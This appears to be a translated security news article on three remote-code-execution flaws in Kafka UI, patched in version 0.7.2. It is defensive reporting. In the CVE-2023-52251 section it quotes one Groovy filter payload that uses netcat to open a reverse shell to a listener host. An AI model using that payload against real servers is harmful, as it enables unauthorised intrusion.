A recent security research has revealed multiple vulnerabilities in the popular open-source Kafka UI application, used primarily by developers and administrators to manage and monitor Apache Kafka clusters. The tool, designed to provide a visual representation of connected Kafka clusters, does not require authentication in its default configuration, resulting in many unprotected instances of Kafka UI, some even exposed to the internet.
One of the most alarming discoveries indicates that these unprotected instances represent a potential gateway to internal networks, potentially exposing public or non-sensitive data, which may underestimate a security threat. Detailed research has uncovered three vulnerabilities that allow remote code execution (RCE) in Kafka UI.
CVE-2023-52251: Arbitrary code execution via Groovy scripts
The first finding, identified as CVE-2023-52251, is related to Kafka UI’s message filtering functionality, which allows for simple queries to filter messages on the server. It was discovered that Kafka UI supports the GROOVY_SCRIPT filter type, evaluating the query as a Groovy script, allowing an attacker to execute arbitrary code. For example, an attacker could create a malicious filter with the content new ProcessBuilder(«nc»,»host.docker.internal»,»1234″,»-e»,»sh»).start(), gaining reverse shell access on the affected server.
CVE-2024-32030: Code execution via JMX connector
Another vulnerability, categorized as CVE-2024-32030, affects the JMX connector. In cases where Kafka UI is configured to allow dynamic reconfiguration via the API, an attacker can connect Kafka UI to an arbitrary JMX server and execute deserialization attacks, similar to the JNDI attacks that exploited vulnerabilities in the past. This exploitation allows attackers to run arbitrary commands on the Kafka UI server.
CVE-2023-25194: Code execution via JndiLoginModule
The third vulnerability, CVE-2023-25194, involves the incorrect configuration of sasl.jaas.config that allows loading a JndiLoginModule module. An attacker can exploit this configuration to connect Kafka UI to a malicious JNDI server, executing deserialization attacks that result in the execution of arbitrary code.
The discovered vulnerabilities have been patched in Kafka UI version 0.7.2, released on April 10, 2024. It is vital that all Kafka UI users update to this version to mitigate these security risks. This update prevents vulnerabilities by updating underlying libraries and restricting the loading of dangerous modules.
The research highlights the need for robust security practices in modern administration tools like Kafka UI. The execution of advanced features such as Groovy scripting and JMX connections should be carefully controlled to prevent potential abuse. Technologies surrounding Java and its extensions, while powerful, can be exploited if not handled properly.
These findings serve as a reminder of persistent risks and the need to stay up-to-date with the latest security practices and patches.
Source: MiMub in Spanish
